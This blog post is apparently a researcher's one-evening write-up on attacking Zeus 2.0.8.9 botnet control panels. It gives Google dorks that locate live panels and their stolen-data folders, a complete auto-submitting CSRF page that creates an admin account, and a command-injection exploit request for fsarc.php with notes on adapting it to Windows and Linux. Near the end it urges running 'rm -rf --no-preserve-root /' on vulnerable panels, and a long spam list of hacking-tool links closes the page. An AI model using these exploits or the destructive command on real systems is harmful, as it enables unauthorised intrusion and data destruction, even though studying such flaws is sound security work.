I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
- inurl:cp.php?m=login - this should be the login to the control panel
- inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
- inurl:install/index.php - this should be deleted, but I think this is useless now.
Boring vulns found
- Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
- No password policy - admins can set up really weak passwords
- No anti brute-force - you can try to guess the admin's password. Default username is admin
- Password autocomplete enabled - boring
- Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
- No CSRF protection - except on the password change, where the old password is needed :-( boring
<html> <head> <title></title> </head> <body> <pre> This is a CSRF POC to create a new admin user in Zeus admin panels. Username: user_1392719246 Password: admin1 You might change the URL from 127.0.0.1. Redirecting in a hidden iframe in <span id="countdown">10</span> seconds. </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe> <form action="http://127.0.0.1/cp.php?m=sys_users&new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame"> <input name="name" type="hidden" value="user_1392719246" /> <input name="password" type="hidden" value="admin1" /> <input name="status" type="hidden" value="1" /> <input name="comment" type="hidden" value="PWND!" /> <input name="r_botnet_bots" type="hidden" value="1" /> <input name="r_botnet_scripts" type="hidden" value="1" /> <input name="r_botnet_scripts_edit" type="hidden" value="1" /> <input name="r_edit_bots" type="hidden" value="1" /> <input name="r_reports_db" type="hidden" value="1" /> <input name="r_reports_db_edit" type="hidden" value="1" /> <input name="r_reports_files" type="hidden" value="1" /> <input name="r_reports_files_edit" type="hidden" value="1" /> <input name="r_reports_jn" type="hidden" value="1" /> <input name="r_stats_main" type="hidden" value="1" /> <input name="r_stats_main_reset" type="hidden" value="1" /> <input name="r_stats_os" type="hidden" value="1" /> <input name="r_system_info" type="hidden" value="1" /> <input name="r_system_options" type="hidden" value="1" /> <input name="r_system_user" type="hidden" value="1" /> <input name="r_system_users" type="hidden" value="1" /> </form> <script type="text/javascript"> window.onload=function(){ var counter = 10; var interval = setInterval(function() { counter--; document.getElementById('countdown').innerHTML = counter; if (counter == 0) { redirect(); clearInterval(interval); } }, 1000); }; function redirect() { document.getElementById("csrf-form").submit(); } </script> </body> </html> - MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
- ClickJacking - really boring stuff
- Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
- SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.
Whats good news (for the C&C panel owners)
The following stuff looks good, at least some vulns were taken seriously:
- The system directory is protected with .htaccess deny from all.
- gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
- Anti XSS: the following code is used almost everywhere
return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8'); My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda. What's really bad news (for the C&C panel owners)
And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).
The vulnerable code is in system/fsarc.php:
function fsarcCreate($archive, $files){ ... $archive .= '.zip'; $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); } The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60 filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)
That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )
Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related articles
- How To Install Pentest Tools In Ubuntu
- What Are Hacking Tools
- Physical Pentest Tools
- Hacker Tools Linux
- Pentest Tools Framework
- Hacking Tools For Windows Free Download
- Hack Tools For Ubuntu
- Ethical Hacker Tools
- Pentest Tools Windows
- Hacker Tools Online
- Hacker Tools 2019
- Hak5 Tools
- Hacking Tools For Beginners
- Pentest Tools Apk
- Hacker
- Pentest Tools Website
- Underground Hacker Sites
- Pentest Tools Framework
- Underground Hacker Sites
- Hacking Apps
- Hacking Tools 2019
- Hacker Techniques Tools And Incident Handling
- Computer Hacker
- Hacker Tools Linux
- Termux Hacking Tools 2019
- Pentest Tools List
- What Is Hacking Tools
- Hacking Tools Kit
- Hacker
- Hacker Tools Apk
- Hack Tools For Pc
- Pentest Tools Online
- Hak5 Tools
- Hacking Tools Github
- Hacker Tools For Windows
- Best Hacking Tools 2020
- World No 1 Hacker Software
- Hacker Tools For Mac
- Hacker Tools 2020
- Pentest Tools Android
- Tools Used For Hacking
- Hacking Tools Usb
- Wifi Hacker Tools For Windows
- Hacker Tools Hardware
- Hacker Tools Free
- Pentest Tools Android
- Hacker Tools
- Hack Tools For Ubuntu
- Hacker Tools 2019
- Hack Website Online Tool
- Tools For Hacker
- Pentest Tools Website Vulnerability
- Hacking Tools For Beginners
- Hacking Tools And Software
- Hacker Hardware Tools
- Hacking App
- Hacker Tools Linux
- Pentest Tools Port Scanner
- Pentest Tools Review
- Hacker
- Hacking Tools Hardware
- Hack Tools Download
- Blackhat Hacker Tools
- Hacking Tools Pc
- Hacking Tools
- Pentest Tools Bluekeep
- Pentest Tools Tcp Port Scanner
- Hacking Tools Software
- Computer Hacker
- New Hacker Tools
- Hacks And Tools
- Hack Tool Apk
- Hacker Tools Free
- Hacker Tools Apk Download
- Hacker Tools For Windows
- World No 1 Hacker Software
- Hack Tools
- Hacker Tools 2019
- Hacking App
- Hacker Tools Free Download
- Hack Tools Pc
- Pentest Tools Website
- Hacker Tools For Ios
- Pentest Tools Linux
- Underground Hacker Sites
- Hacking Tools Free Download
- Pentest Tools For Windows
- Hacking Tools
- Hack Tools Github
- Hacking Tools Windows
- Hack Tools Download
- Hack And Tools
- Hacking Tools Download
- Pentest Tools Android
- Hacking Tools For Windows Free Download
- Computer Hacker
- Hack Tools Download
- Hacking Tools Online
- Hack Tools For Games
- Hacking Tools Name
- What Is Hacking Tools
- Hacker Search Tools
- Hacking Tools For Windows Free Download
- Tools For Hacker
- Hacking Tools Download
- Hacker Tools For Mac
- Hack App
- Pentest Tools Open Source
- Hacking Tools 2019
- Underground Hacker Sites
- Bluetooth Hacking Tools Kali
- Usb Pentest Tools
- Hacker Tools Free
- Pentest Tools Apk
- Pentest Tools Nmap
- Pentest Tools Online
- Hack Tools
- Hackrf Tools
- How To Hack
- Hacker Tools Mac
- Hack Tools
- Pentest Tools List
- Best Hacking Tools 2020
- Black Hat Hacker Tools
- Blackhat Hacker Tools
- Hacking Tools Mac
- Hacker Tools Apk
- Hackers Toolbox
- Beginner Hacker Tools
- Computer Hacker
- Hack App
- Github Hacking Tools
- Nsa Hack Tools Download
- Hacking Tools Hardware
- Pentest Automation Tools
- Hacking Tools Kit
- Hacking App
- Hacker Tools Mac
- Pentest Tools Open Source
- Termux Hacking Tools 2019
- Hacker Tools Linux
- Hackrf Tools
- Pentest Tools For Ubuntu
- Hack Tools
- Hack Tools Mac
- Hack Tools Pc
- Hacking Tools Hardware
- Hacks And Tools
- Pentest Tools Download
- Hacker Tools Software
- Hacking Tools Windows 10
- Hack App
- Pentest Tools Website
- Hacker Tools
- Hack Rom Tools
- Hacker Tools For Mac
- Hacker Tools Windows
- Android Hack Tools Github
- Hacker Search Tools
- Pentest Tools Free
- Best Hacking Tools 2020
- Hackers Toolbox
- How To Hack
- Pentest Tools For Mac
- Hacking Apps
- Beginner Hacker Tools
- Hacking Tools Online
- Easy Hack Tools
- Android Hack Tools Github
- Top Pentest Tools
- Hacker Tools Online
- Hacking Tools Usb
- Hacking App
No comments:
Post a Comment